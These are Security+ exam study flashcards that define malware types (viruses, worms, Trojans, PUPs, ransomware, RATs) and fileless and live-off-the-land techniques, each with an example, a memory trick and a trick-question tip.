Class 13: Malware, Attack Indicators, and Exploitation Techniques

Malware

Malware is software that does something harmful or unwanted from the perspective of the system owner.

Example: Software that steals data, damages files, secretly controls a system, or disrupts operations is malware.

Memory trick: Malware means malicious software.

Trick question tip: The key viewpoint is the system owner’s perspective, not whether the software looks useful.

Malware classification

Malware classification groups malicious or unwanted software by how it spreads, how it executes, or what payload it delivers.

Example: Virus, worm, Trojan, PUP, spyware, rootkit, RAT, and ransomware are malware-related classifications.

Memory trick: Classification answers “what kind of bad software is this?”

Trick question tip: Some classifications are based on vector, while others are based on payload.

Installation expectation factor

Malware classification can be complicated by whether the software’s installation was expected, tolerated, hidden, or confusingly consented to by the user.

Example: A Trojan installs secretly, while a PUP may be bundled with software the user chose to install.

Memory trick: Consent changes how we label the software.

Trick question tip: PUPs/PUAs are not always automatically treated the same as Trojans because installation may involve confusing or indirect consent.

Malware vector

A malware vector is the method by which malware executes on a computer and potentially spreads to other hosts.

Example: A worm spreading across hosts and a Trojan hidden in an installer use different vectors.

Memory trick: Vector means how it gets in or spreads.

Trick question tip: Virus, worm, and Trojan classifications focus mainly on vector.

Vector-based malware classification

Vector-based malware classification groups malware by how it executes, installs, or spreads.

Example: Viruses, worms, Trojans, and PUPs can be discussed by their installation or spread method.

Memory trick: Vector classification is about delivery and movement.

Trick question tip: If the question asks how malware spreads or gets installed, think vector.

Payload

A payload is the action performed by malware beyond simply replicating or persisting on a host.

Example: Encrypting files, spying on users, or enabling remote control are payload actions.

Memory trick: Payload is what the malware does after it arrives.

Trick question tip: Ransomware, spyware, rootkit, and RAT are examples of payload-based classifications.

Payload-based malware classification

Payload-based malware classification groups malware by the harmful action or capability it delivers.

Example: Spyware collects information, ransomware encrypts data for payment, and a RAT allows remote access.

Memory trick: Payload classification is about the effect.

Trick question tip: If the question asks what malware does, think payload.

Virus

A virus is malware that spreads by being concealed within the executable code of another process or file.

Example: A legitimate-looking executable becomes infected with malicious code that runs when the program runs.

Memory trick: Virus attaches to another program.

Trick question tip: If malware infects executable code of another process, virus is the best match.

Worm

A worm is malware that can spread to other systems without user authorization and does not rely on being bundled with a legitimate installer.

Example: A worm moves across network hosts by exploiting exposed weaknesses or network conditions.

Memory trick: Worms crawl across networks.

Trick question tip: Worms are known for spreading without user authorization.

Virus vs worm

A virus infects executable code of another process, while a worm is known for spreading across systems without user authorization.

Example: Malware attached to a program is virus-like; malware spreading between hosts is worm-like.

Memory trick: Virus attaches; worm travels.

Trick question tip: Security+ often tests whether the malware needs a host file or spreads independently.

Infected process

An infected process is a legitimate process or executable that has malware concealed within its code.

Example: A normal application runs but also executes hidden malicious code.

Memory trick: Infected means malware is hiding inside the process.

Trick question tip: Malware concealed within executable code points to infection.

Trojan

A Trojan is malware concealed within an installer package or software that appears legitimate but secretly performs malicious activity.

Example: A user installs a fake utility that secretly installs malicious software.

Memory trick: Trojan looks useful but hides the threat inside.

Trick question tip: Legitimate-looking software hiding malware points to Trojan.

Trojan consent distinction

A Trojan does not seek real consent for malicious installation and is designed to operate secretly.

Example: A user thinks they installed a normal app, but the installer secretly adds malware.

Memory trick: Trojan tricks, not asks.

Trick question tip: Secret malicious installation inside legitimate-looking software is Trojan, not PUP.

Potentially unwanted program (PUP)

A PUP is software installed alongside selected software or bundled with a system that may be unwanted but is not automatically classified as malicious.

Example: Extra bundled software is installed while the user installs another application.

Memory trick: PUP means probably unwanted program.

Trick question tip: Bundled or indirectly consented software is often PUP/PUA rather than Trojan.

Potentially unwanted application (PUA)

A PUA is another term for software that may be unwanted, bundled, or confusingly consented to, but is not always automatically malicious.

Example: A bundled application changes user settings or adds unwanted features after installation.

Memory trick: PUA and PUP are basically the unwanted bundle category.

Trick question tip: PUP and PUA are closely related terms.

PUP/PUA consent issue

PUPs and PUAs may be installed without active consent or through a confusing license agreement.

Example: A user clicks through an installer and accidentally agrees to bundled extra software.

Memory trick: PUP consent is often blurry.

Trick question tip: Confusing license agreements and bundled installs point to PUP/PUA.

PUP vs Trojan

A Trojan is secretly malicious software disguised as legitimate, while a PUP may be unwanted or confusingly consented to but is not automatically malicious.

Example: A fake utility hiding malware is a Trojan; bundled extra software may be a PUP.

Memory trick: Trojan hides harm; PUP sneaks in as an unwanted extra.

Trick question tip: The consent and intent distinction matters on Security+.

Grayware

Grayware is software that falls between clearly legitimate software and clearly malicious malware, often because it is unwanted or intrusive but not automatically malicious.

Example: A bundled toolbar or unwanted utility may be described as grayware.

Memory trick: Grayware lives in the gray area.

Trick question tip: PUPs/PUAs are sometimes described as grayware.

Bloatware

Bloatware is unwanted or unnecessary software bundled with a system or installation package.

Example: A new computer comes with extra trial software the user did not specifically request.

Memory trick: Bloatware bloats the system with extras.

Trick question tip: Preinstalled or bundled unwanted software may be called bloatware.

Bundled software

Bundled software is additional software included with another software package or computer system.

Example: An installer includes optional extra applications alongside the main program.

Memory trick: Bundled means packaged together.

Trick question tip: Bundling can produce PUPs, PUAs, grayware, or bloatware.

Spyware

Spyware is a payload-based malware classification focused on secretly collecting information about users, systems, or activity.

Example: Spyware monitors user behavior or collects sensitive information without proper authorization.

Memory trick: Spyware spies.

Trick question tip: Information gathering as the harmful action points to spyware.

Rootkit

A rootkit is a payload-based malware classification focused on hiding malicious activity or maintaining privileged, stealthy access.

Example: A rootkit hides processes or files so malicious activity is harder to detect.

Memory trick: Rootkit hides deep.

Trick question tip: Stealth and hiding malicious presence point to rootkit.

Remote Access Trojan (RAT)

A RAT is malware that provides unauthorized remote access or control over a victim system.

Example: A RAT lets an attacker remotely control a compromised host.

Memory trick: RAT means remote control.

Trick question tip: Unauthorized remote control as the payload points to RAT.

Ransomware

Ransomware is malware that prevents access to data or systems and demands payment or another action for restoration.

Example: Ransomware encrypts user files and displays a payment demand.

Memory trick: Ransomware holds data hostage.

Trick question tip: Encryption plus demand for payment points to ransomware.

Vector vs payload classification

Vector classification describes how malware executes or spreads, while payload classification describes what the malware does after execution.

Example: Trojan describes a deceptive installation vector, while ransomware describes a harmful payload.

Memory trick: Vector is how it arrives; payload is what it does.

Trick question tip: Malware can be described by both vector and payload in the same scenario.

Malware classification defense in depth

Malware classification defense in depth combines identifying whether software is malicious or unwanted, distinguishing vector from payload, recognizing viruses, worms, Trojans, PUPs/PUAs, grayware, bloatware, spyware, rootkits, RATs, and ransomware, and considering the role of consent and user expectation.

Example: Analysts classify suspicious software by asking how it installed, whether it spread, whether consent was valid, and what harmful action it performed.

Memory trick: Ask two questions: how did it get there, and what does it do?

Trick question tip: Security+ may mix vector and payload terms, so separate delivery method from malicious action.

Computer virus

A computer virus is malware designed to replicate and spread from computer to computer, usually by infecting executable applications or program code.<br><br><b>Example:</b> A virus hides inside an executable file and runs when the infected program starts.<br><br><b>Memory trick:</b> A virus infects a host file like a biological virus infects a host cell.<br><br><b>Trick question tip:</b> If malware must attach to or infect a host file or media, think virus.

Virus replication

Virus replication is the process of copying itself into other files, applications, or media so it can spread.<br><br><b>Example:</b> A virus runs with an infected program and attempts to infect other executable files on storage.<br><br><b>Memory trick:</b> Replication means make more copies.<br><br><b>Trick question tip:</b> Replication plus host infection is a major virus clue.

Virus infection

Infection occurs when virus code is concealed inside executable applications, program code, files, or boot media.<br><br><b>Example:</b> A normal application becomes infected when malicious code is inserted into it.<br><br><b>Memory trick:</b> Infection means malware is hidden inside something else.<br><br><b>Trick question tip:</b> Viruses infect host files or media; they do not just exist as standalone unwanted apps.

Host executable file

A host executable file is a legitimate executable that carries virus code and runs the virus when the file executes.<br><br><b>Example:</b> A user launches an infected program, causing both the program and virus code to run.<br><br><b>Memory trick:</b> Host executable is the virus’s ride.<br><br><b>Trick question tip:</b> Malware hidden inside a program file points to a file infector virus.

Non-resident virus

A non-resident virus is contained within a host executable file and runs with the host process.<br><br><b>Example:</b> The virus runs only while the infected application is running, then passes control back to the host program.<br><br><b>Memory trick:</b> Non-resident means it does not stay living in memory after the host ends.<br><br><b>Trick question tip:</b> Runs with the host process and returns control to the host equals non-resident/file infector.

File infector virus

A file infector virus infects executable files or process images on persistent storage.<br><br><b>Example:</b> A virus inside one executable attempts to infect other executable files on disk.<br><br><b>Memory trick:</b> File infector spreads through executable files.<br><br><b>Trick question tip:</b> If the virus targets executable files on storage, choose file infector.

Host process

A host process is the running process of the infected program that also executes the virus code.<br><br><b>Example:</b> An infected application starts, and the virus runs as part of that program’s process.<br><br><b>Memory trick:</b> Host process is the infected program while running.<br><br><b>Trick question tip:</b> Non-resident viruses run with the host process.

Persistent storage infection

Persistent storage infection occurs when a virus attempts to infect files or process images stored on disk or other media.<br><br><b>Example:</b> A file infector virus modifies executable files saved on a hard drive.<br><br><b>Memory trick:</b> Persistent storage means the files survive reboot.<br><br><b>Trick question tip:</b> Infecting stored executables is file infector behavior.

Passing control back to host

Passing control back to the host means the virus lets the original program continue running after the virus executes.<br><br><b>Example:</b> An infected program appears to work normally after the virus performs its actions.<br><br><b>Memory trick:</b> Virus runs, then hands the program back.<br><br><b>Trick question tip:</b> This behavior is associated with non-resident/file infector viruses.

Memory-resident virus

A memory-resident virus creates a malicious process in memory when the host file runs and remains in memory even after the host process ends.<br><br><b>Example:</b> A user closes the infected program, but the malicious process continues running in memory.<br><br><b>Memory trick:</b> Resident means it stays living in RAM.<br><br><b>Trick question tip:</b> If the malicious process remains after the host terminates, think memory-resident virus.

Memory-resident process

A memory-resident process is a process that continues running in memory after the original infected host program has ended.<br><br><b>Example:</b> A virus-launched process stays active after the user closes the infected application.<br><br><b>Memory trick:</b> Resident process stays home in memory.<br><br><b>Trick question tip:</b> Persistence in memory after host termination points to memory-resident malware.

Boot virus

A boot virus infects the disk boot sector or partition table and executes when the operating system starts or infected media is attached.<br><br><b>Example:</b> A USB device contains infected boot code that runs when attached or used during startup.<br><br><b>Memory trick:</b> Boot virus starts before or with the OS boot process.<br><br><b>Trick question tip:</b> Boot sector or partition table infection points to a boot virus.

Boot sector

The boot sector is the disk area containing startup code that can be targeted by boot viruses.<br><br><b>Example:</b> A boot virus writes malicious code to the boot sector of removable media.<br><br><b>Memory trick:</b> Boot sector starts the system.<br><br><b>Trick question tip:</b> Malware in the boot sector is classified as a boot virus.

Partition table

The partition table describes disk partitions and can be targeted by boot viruses.<br><br><b>Example:</b> A virus modifies partition table-related startup information so it executes during boot.<br><br><b>Memory trick:</b> Partition table maps the disk.<br><br><b>Trick question tip:</b> Boot viruses may infect the boot sector or partition table.

USB boot virus media

USB media can carry boot virus code that executes when the media is attached or used during startup.<br><br><b>Example:</b> Infected USB media triggers malicious boot code when connected to a computer.<br><br><b>Memory trick:</b> Removable media can carry boot infection.<br><br><b>Trick question tip:</b> Boot viruses can involve fixed disks or USB media.

Script virus

A script virus uses local scripting engines to execute malicious code.<br><br><b>Example:</b> Malicious script code runs through a local operating system or browser scripting feature.<br><br><b>Memory trick:</b> Script virus abuses scripting engines.<br><br><b>Trick question tip:</b> PowerShell, WMI, JavaScript, and script-enabled documents point to script or macro virus behavior.

Macro virus

A macro virus uses macro programming features in documents to execute malicious code.<br><br><b>Example:</b> A document with enabled macro code runs malicious actions when opened.<br><br><b>Memory trick:</b> Macro virus hides in document automation.<br><br><b>Trick question tip:</b> Office documents with VBA code enabled are classic macro virus examples.

PowerShell-based script virus

A PowerShell-based script virus uses PowerShell scripting features to execute malicious actions.<br><br><b>Example:</b> A malicious script abuses PowerShell to run commands on a Windows host.<br><br><b>Memory trick:</b> PowerShell gives scripts strong Windows control.<br><br><b>Trick question tip:</b> PowerShell is a local scripting engine that can be abused by script malware.

WMI-based script virus

A WMI-based script virus uses Windows Management Instrumentation features to execute or manage malicious activity.<br><br><b>Example:</b> Malicious code uses WMI scripting features as part of execution.<br><br><b>Memory trick:</b> WMI lets scripts manage Windows systems.<br><br><b>Trick question tip:</b> WMI abuse belongs with Windows script-based malware.

JavaScript virus

A JavaScript virus uses JavaScript scripting features in browsers, documents, or local environments to execute malicious code.<br><br><b>Example:</b> A malicious PDF or web-related file includes JavaScript that performs harmful actions.<br><br><b>Memory trick:</b> JavaScript can run active code inside supported files or browsers.<br><br><b>Trick question tip:</b> JavaScript-enabled documents or browser scripting can support script virus behavior.

VBA macro virus

A VBA macro virus uses Visual Basic for Applications code in Microsoft Office documents to execute malicious actions.<br><br><b>Example:</b> A document asks the user to enable macros, then VBA code runs malicious activity.<br><br><b>Memory trick:</b> VBA means Office macro code.<br><br><b>Trick question tip:</b> Microsoft Office documents with VBA code enabled point to macro viruses.

PDF JavaScript virus

A PDF JavaScript virus abuses JavaScript features enabled inside PDF documents.<br><br><b>Example:</b> A PDF contains JavaScript-enabled content that attempts malicious activity when opened.<br><br><b>Memory trick:</b> PDFs can contain active script features too.<br><br><b>Trick question tip:</b> JavaScript-enabled PDFs are script/macro virus examples.

Multipartite virus

A multipartite virus uses multiple vectors to infect and spread.<br><br><b>Example:</b> A virus infects both executable files and boot media.<br><br><b>Memory trick:</b> Multipartite means multiple parts or multiple ways.<br><br><b>Trick question tip:</b> Multiple infection vectors in one virus means multipartite.

Polymorphic virus

A polymorphic virus dynamically changes or obfuscates its code to evade detection.<br><br><b>Example:</b> Each copy of the virus looks different enough to make signature detection harder.<br><br><b>Memory trick:</b> Polymorphic means many forms.<br><br><b>Trick question tip:</b> Code changing or obfuscation to evade detection points to polymorphic malware.

Obfuscation

Obfuscation hides or disguises code so security tools and analysts have more difficulty recognizing it.<br><br><b>Example:</b> Malware changes its code appearance while keeping the same behavior.<br><br><b>Memory trick:</b> Obfuscation makes code look confusing.<br><br><b>Trick question tip:</b> Obfuscation is commonly used to evade detection.

Virus host requirement

Viruses must infect a host file or media to spread or execute in the classic virus sense.<br><br><b>Example:</b> A virus travels inside an executable attachment or infected USB media.<br><br><b>Memory trick:</b> Virus needs a host.<br><br><b>Trick question tip:</b> If it does not infect a host file or media, another malware classification may fit better.

Infected file distribution

An infected file can be distributed through normal channels such as disk, network shares, email attachments, social media posts, or website downloads.<br><br><b>Example:</b> A user downloads an infected executable from a website and runs it.<br><br><b>Memory trick:</b> Infected files spread through normal sharing paths.<br><br><b>Trick question tip:</b> Normal file distribution methods can still carry infected files.

Email attachment virus distribution

Email attachments can distribute infected files to users.<br><br><b>Example:</b> A malicious attachment is sent to users and detected by a mail filter.<br><br><b>Memory trick:</b> Attachments can carry infected files.<br><br><b>Trick question tip:</b> Unsafe executable attachments are common virus delivery examples.

Social media virus distribution

Social media posts can distribute infected files or links to infected downloads.<br><br><b>Example:</b> A shared post links to a file that contains infected executable code.<br><br><b>Memory trick:</b> Social sharing can spread infected files.<br><br><b>Trick question tip:</b> Infected files can spread through social platforms, not just email.

Website download virus distribution

Website downloads can distribute infected files to users.<br><br><b>Example:</b> A user downloads a program from a site, and the executable is infected with virus code.<br><br><b>Memory trick:</b> Downloads can carry infection.<br><br><b>Trick question tip:</b> A downloaded infected executable still fits virus behavior if it infects host code or media.

Double file extension

A double file extension is a deceptive naming trick that tries to make a dangerous file look harmless.<br><br><b>Example:</b> A file name appears to be a document but actually ends with an executable extension.<br><br><b>Memory trick:</b> Double extension hides the real file type.<br><br><b>Trick question tip:</b> Double extensions are social engineering clues, especially in unsafe attachments.

Unsafe attachment filter

An unsafe attachment filter detects or blocks risky email attachments before users open them.<br><br><b>Example:</b> A mail filter warns that an attachment is unsafe because it appears executable or suspicious.<br><br><b>Memory trick:</b> Attachment filters stop risky files before opening.<br><br><b>Trick question tip:</b> Mail filters can detect unsafe attachments, including suspicious double-extension files.

Computer viruses defense in depth

Computer viruses defense in depth combines recognizing host-file infection, file infectors, memory-resident behavior, boot sector or partition table infection, script and macro abuse, multipartite vectors, polymorphic obfuscation, infected file distribution, unsafe attachments, and double-extension deception.<br><br><b>Example:</b> An analyst classifies malware by checking whether it infects executable files, remains in memory, targets boot media, abuses scripts or macros, changes its code, or spreads through unsafe attachments.<br><br><b>Memory trick:</b> Virus needs a host, then spreads through files, memory, boot media, scripts, or macros.<br><br><b>Trick question tip:</b> Security+ virus questions usually test what is infected and whether the virus changes form, stays resident, or uses multiple vectors.

Computer worm

A computer worm is memory-resident malware that can run without user intervention and replicate over network resources.<br><br><b>Example:</b> A worm exploits a vulnerable server process and then spreads to other vulnerable hosts on the network.<br><br><b>Memory trick:</b> Worms move on their own.<br><br><b>Trick question tip:</b> If malware spreads over the network without the user opening an infected file, think worm.

Worm vs virus

A virus usually needs user action to execute an infected file or media, while a worm can execute and replicate through network resources without user intervention.<br><br><b>Example:</b> Opening an infected macro document triggers a virus, but a worm may spread through a vulnerable server application.<br><br><b>Memory trick:</b> Virus needs a click; worm can crawl by itself.<br><br><b>Trick question tip:</b> User action points more toward virus; autonomous network replication points more toward worm.

Memory-resident worm

A memory-resident worm runs in memory and can continue operating without needing a normal file-based execution path.<br><br><b>Example:</b> A worm runs as a process in memory after exploiting a vulnerable service.<br><br><b>Memory trick:</b> Resident means it lives in RAM.<br><br><b>Trick question tip:</b> Worms are described as memory-resident malware.

User intervention

User intervention is an action by the user that causes malware to execute, such as opening a file, running an attachment, or attaching infected media.<br><br><b>Example:</b> A user opens a macro-enabled document and triggers malware execution.<br><br><b>Memory trick:</b> Intervention means the user helps it run.<br><br><b>Trick question tip:</b> Viruses often need user action; worms do not require it in the same way.

Vulnerability exploitation by worms

Worms can execute by exploiting vulnerabilities in processes, servers, websites, or file shares.<br><br><b>Example:</b> A worm exploits a vulnerable server application and then scans for more vulnerable systems.<br><br><b>Memory trick:</b> Worms exploit weak spots to spread.<br><br><b>Trick question tip:</b> Exploiting a vulnerability to self-replicate over the network points to worm behavior.

Website-triggered worm execution

A worm may execute when a user browses a website that exposes a vulnerable process or browser-related component.<br><br><b>Example:</b> A user visits a site and a vulnerable component is exploited, allowing worm activity.<br><br><b>Memory trick:</b> Browsing can expose vulnerable processes.<br><br><b>Trick question tip:</b> The user may only browse normally; the worm uses the vulnerability to execute.

Vulnerable server application

A vulnerable server application can be exploited by a worm to execute code and spread to other hosts.<br><br><b>Example:</b> A worm targets vulnerable web server software and then looks for additional vulnerable servers.<br><br><b>Memory trick:</b> Vulnerable servers give worms a doorway.<br><br><b>Trick question tip:</b> Worms commonly spread by targeting vulnerable network services.

Infected file share

An infected file share can expose connected systems to worm activity through shared network resources.<br><br><b>Example:</b> A host connected to a compromised file share becomes exposed to worm replication.<br><br><b>Memory trick:</b> Shared resources can spread shared problems.<br><br><b>Trick question tip:</b> Network file shares can be worm spread paths.

Code Red worm

Code Red was a worm that infected early Microsoft IIS web servers by exploiting a buffer overflow vulnerability and scanning IP ranges for more vulnerable systems.<br><br><b>Example:</b> After infecting one vulnerable IIS server, Code Red scanned for additional vulnerable servers.<br><br><b>Memory trick:</b> Code Red = IIS worm example.<br><br><b>Trick question tip:</b> Code Red is a classic worm example involving IIS and buffer overflow exploitation.

Buffer overflow vulnerability

A buffer overflow vulnerability occurs when a process mishandles memory input, potentially allowing code execution.<br><br><b>Example:</b> A worm exploits a buffer overflow in a server application to run malicious code.<br><br><b>Memory trick:</b> Buffer overflow means too much data spills into dangerous memory areas.<br><br><b>Trick question tip:</b> Worms can exploit vulnerabilities such as buffer overflows to execute.

Random IP scanning

Random IP scanning is when malware searches randomly generated IP ranges to find more vulnerable targets.<br><br><b>Example:</b> A worm scans random address ranges looking for hosts running a vulnerable service.<br><br><b>Memory trick:</b> Random scanning means the worm is hunting for new victims.<br><br><b>Trick question tip:</b> Scanning IP ranges to infect other systems is worm-like propagation.

Network bandwidth consumption

Worm replication can rapidly consume network bandwidth as the worm spreads.<br><br><b>Example:</b> A worm generates large amounts of scanning and replication traffic across the network.<br><br><b>Memory trick:</b> Worms can flood the network while crawling.<br><br><b>Trick question tip:</b> Rapid bandwidth consumption is a classic worm impact.

Worm denial of service

A worm can cause denial of service by consuming resources, crashing an operating system, or crashing a server application.<br><br><b>Example:</b> A worm overloads a vulnerable server application until it crashes.<br><br><b>Memory trick:</b> Worms can break availability while spreading.<br><br><b>Trick question tip:</b> Crashing systems or services through worm activity is a DoS effect.

Worm payload

A worm payload is any malicious action performed by the worm beyond replication.<br><br><b>Example:</b> A worm spreads across the network and also installs additional malware on infected hosts.<br><br><b>Memory trick:</b> Replication is how it spreads; payload is what else it does.<br><br><b>Trick question tip:</b> Worms, like viruses, can carry many different payloads.

Remote code execution

Remote code execution is the ability to run code on a remote system, often through a vulnerability.<br><br><b>Example:</b> A worm uses a vulnerable service to execute code on another host.<br><br><b>Memory trick:</b> Remote code execution means running code from afar.<br><br><b>Trick question tip:</b> Worms can use remote code execution to spread without user action.

Conficker worm

Conficker illustrated how remote code execution and memory-resident malware could produce highly potent worm attacks.<br><br><b>Example:</b> Conficker spread through vulnerable systems and showed the danger of automated worm propagation.<br><br><b>Memory trick:</b> Conficker = powerful worm example.<br><br><b>Trick question tip:</b> Conficker is associated with worm behavior, remote code execution, and memory-resident malware.

Fileless malware

Fileless malware describes malware techniques that avoid writing the main malicious code to disk and instead rely heavily on memory-resident execution and legitimate tools.<br><br><b>Example:</b> Malware runs in memory and uses scripting tools rather than dropping a traditional executable file.<br><br><b>Memory trick:</b> Fileless means less obvious file evidence.<br><br><b>Trick question tip:</b> Fileless is not one single definitive class; it describes common modern behaviors and techniques.

Fileless malware classification

Fileless is not a definitive malware classification but a description of behaviors such as memory-resident execution, scripting abuse, obfuscation, and living off the land.<br><br><b>Example:</b> An attack uses PowerShell, registry persistence, and in-memory code instead of a normal malware file.<br><br><b>Memory trick:</b> Fileless describes the style, not one exact family.<br><br><b>Trick question tip:</b> Do not treat fileless as meaning absolutely no disk activity ever occurs.

No code written to disk

Fileless malware usually does not write its main malicious code to disk.<br><br><b>Example:</b> The malware runs in memory after execution rather than saving a traditional executable payload.<br><br><b>Memory trick:</b> No main malware file on disk makes detection harder.<br><br><b>Trick question tip:</b> Fileless malware avoids writing code to disk, but it may still change other disk-based artifacts.

Fileless disk activity

Fileless malware may still create disk activity, such as modifying registry values for persistence or relying on a downloaded script, attachment, or Trojan package for initial execution.<br><br><b>Example:</b> Malware avoids storing its main code as a file but changes registry values so it runs after reboot.<br><br><b>Memory trick:</b> Fileless does not mean zero disk traces.<br><br><b>Trick question tip:</b> The phrase fileless is about avoiding traditional malware files, not eliminating every disk change.

Memory-resident fileless execution

Fileless malware uses memory-resident techniques to run in its own process, a host process, a DLL, or a scripting host.<br><br><b>Example:</b> Malicious code runs inside a legitimate scripting host instead of from a saved executable.<br><br><b>Memory trick:</b> Fileless malware lives in memory and borrows hosts.<br><br><b>Trick question tip:</b> Running in memory, host processes, DLLs, or scripting hosts points to fileless techniques.

Host process execution

Host process execution occurs when malware runs inside another legitimate process.<br><br><b>Example:</b> Malicious code executes within a trusted process to reduce visibility.<br><br><b>Memory trick:</b> Malware hides inside a normal process.<br><br><b>Trick question tip:</b> Fileless malware may run within a host process.

Dynamic Link Library (DLL) execution

DLL execution occurs when code runs through a dynamic link library loaded by a process.<br><br><b>Example:</b> Malware executes through a DLL instead of a standalone executable file.<br><br><b>Memory trick:</b> DLLs let code run inside other processes.<br><br><b>Trick question tip:</b> Fileless malware may run within a DLL.

Scripting host execution

Scripting host execution occurs when malware runs through legitimate scripting environments.<br><br><b>Example:</b> Malicious code executes through PowerShell or WMI rather than a compiled executable.<br><br><b>Memory trick:</b> Scripting hosts let attackers use built-in tools.<br><br><b>Trick question tip:</b> PowerShell and WMI execution are common fileless and live off the land clues.

Registry persistence

Registry persistence uses registry value changes to make malware execute again after a system restart.<br><br><b>Example:</b> Malware modifies a registry value so code runs when the host boots.<br><br><b>Memory trick:</b> Registry persistence gives malware a reboot comeback.<br><br><b>Trick question tip:</b> Fileless malware may use registry changes even if it avoids writing main code to disk.

Initial execution dependency

Initial execution dependency means fileless malware may still rely on a user running a script, attachment, or Trojan package to begin execution.<br><br><b>Example:</b> A user opens a downloaded script that starts memory-resident malware activity.<br><br><b>Memory trick:</b> Fileless attacks may still need a starting trigger.<br><br><b>Trick question tip:</b> Fileless does not always mean no user action or no initial file involvement.

Shellcode

Shellcode is lightweight code used by malware to establish a backdoor or perform initial malicious actions on a host.<br><br><b>Example:</b> Fileless malware uses small shellcode to open a backdoor mechanism and retrieve more payloads.<br><br><b>Memory trick:</b> Shellcode is small code that opens the door.<br><br><b>Trick question tip:</b> Lightweight code used for backdoor setup points to shellcode.

Backdoor mechanism

A backdoor mechanism provides hidden or unauthorized access to a host after compromise.<br><br><b>Example:</b> Shellcode creates a way for the threat actor to return and download additional packages.<br><br><b>Memory trick:</b> Backdoor means secret return entrance.<br><br><b>Trick question tip:</b> Unauthorized hidden access after compromise is a backdoor.

Obfuscated shellcode

Obfuscated shellcode is shellcode rewritten or disguised to evade scanner detection.<br><br><b>Example:</b> The attacker recompiles shellcode in a different obfuscated form to bypass signature-based detection.<br><br><b>Memory trick:</b> Obfuscated shellcode wears a disguise.<br><br><b>Trick question tip:</b> Recompiled or disguised code to evade scanners points to obfuscation.

Payload download

Fileless malware may download additional packages or payloads after the initial backdoor is established.<br><br><b>Example:</b> Shellcode downloads another payload to complete the threat actor’s objective.<br><br><b>Memory trick:</b> Small starter code can pull bigger payloads later.<br><br><b>Trick question tip:</b> Downloading additional payloads after initial execution is common in modern malware.

On-the-fly compilation

On-the-fly compilation builds or compiles code during execution to avoid storing obvious static malware files.<br><br><b>Example:</b> A payload is streamed and compiled during execution to avoid automated detection.<br><br><b>Memory trick:</b> On the fly means built while running.<br><br><b>Trick question tip:</b> Streaming, compiling, and obfuscating during execution are fileless evasion techniques.

Static threat detection

Static threat detection identifies malware based on stored files, known signatures, or unchanging code patterns.<br><br><b>Example:</b> A scanner detects a known malicious executable stored on disk.<br><br><b>Memory trick:</b> Static detection looks for known files or patterns.<br><br><b>Trick question tip:</b> Fileless and obfuscated malware evolved partly to evade static detection.

Live off the land

Live off the land means using legitimate built-in system tools instead of compiled malicious executables to perform attacker actions.<br><br><b>Example:</b> An attacker uses PowerShell and WMI to scan systems, change settings, and move data.<br><br><b>Memory trick:</b> Live off the land means use what is already there.<br><br><b>Trick question tip:</b> Abuse of legitimate admin tools instead of malware binaries points to live off the land.

PowerShell abuse

PowerShell abuse uses a legitimate Windows scripting tool to execute malicious payload actions.<br><br><b>Example:</b> Malware uses PowerShell to collect information or change settings with the user’s permissions.<br><br><b>Memory trick:</b> PowerShell can be powerful for admins and attackers.<br><br><b>Trick question tip:</b> PowerShell is a common live off the land and fileless technique.

WMI abuse

WMI abuse uses Windows Management Instrumentation to execute commands, manage systems, or support malicious activity.<br><br><b>Example:</b> Malware uses WMI to run commands without dropping a traditional executable.<br><br><b>Memory trick:</b> WMI lets attackers manage Windows like admins do.<br><br><b>Trick question tip:</b> WMI is a common legitimate tool abused in fileless attacks.

Sufficient permissions in LOTL

Sufficient permissions allow live off the land tools to perform powerful actions such as scanning, reconfiguring settings, and exfiltrating data.<br><br><b>Example:</b> A compromised account with elevated permissions lets scripts make system changes and access sensitive data.<br><br><b>Memory trick:</b> Built-in tools become dangerous with the right permissions.<br><br><b>Trick question tip:</b> Fileless malware effectiveness often depends on permissions.

LOTL scanning

LOTL scanning uses legitimate system tools to discover hosts, services, or resources.<br><br><b>Example:</b> A script uses built-in commands to identify reachable systems.<br><br><b>Memory trick:</b> Scanning can happen with normal tools.<br><br><b>Trick question tip:</b> Live off the land does not require a separate scanner executable.

LOTL reconfiguration

LOTL reconfiguration uses legitimate system tools to change settings for attacker objectives.<br><br><b>Example:</b> A script changes security settings using built-in administration tools.<br><br><b>Memory trick:</b> Legit tools can still change defenses.<br><br><b>Trick question tip:</b> Reconfiguring settings with built-in tools is live off the land behavior.

LOTL data exfiltration

LOTL data exfiltration uses legitimate tools or scripting environments to move data out of the environment.<br><br><b>Example:</b> A script uses built-in network capabilities to transmit collected data.<br><br><b>Memory trick:</b> Exfiltration can ride on trusted tools.<br><br><b>Trick question tip:</b> Data theft using legitimate scripting tools can be fileless/LOTL behavior.

Advanced persistent threat (APT)

APT can describe advanced threat activity that uses stealth, persistence, and sophisticated techniques, including fileless or live off the land methods.<br><br><b>Example:</b> A long-term intrusion uses legitimate tools, registry persistence, and obfuscated code to avoid detection.<br><br><b>Memory trick:</b> APT means advanced and persistent.<br><br><b>Trick question tip:</b> APT emphasizes sustained, advanced intrusion behavior.

Advanced volatile threat (AVT)

AVT can describe modern volatile threats that rely heavily on memory-resident and fileless techniques.<br><br><b>Example:</b> A threat runs mostly in memory and avoids leaving traditional malware files on disk.<br><br><b>Memory trick:</b> Volatile means memory-focused and harder to capture later.<br><br><b>Trick question tip:</b> AVT is associated with modern fileless and memory-resident malware.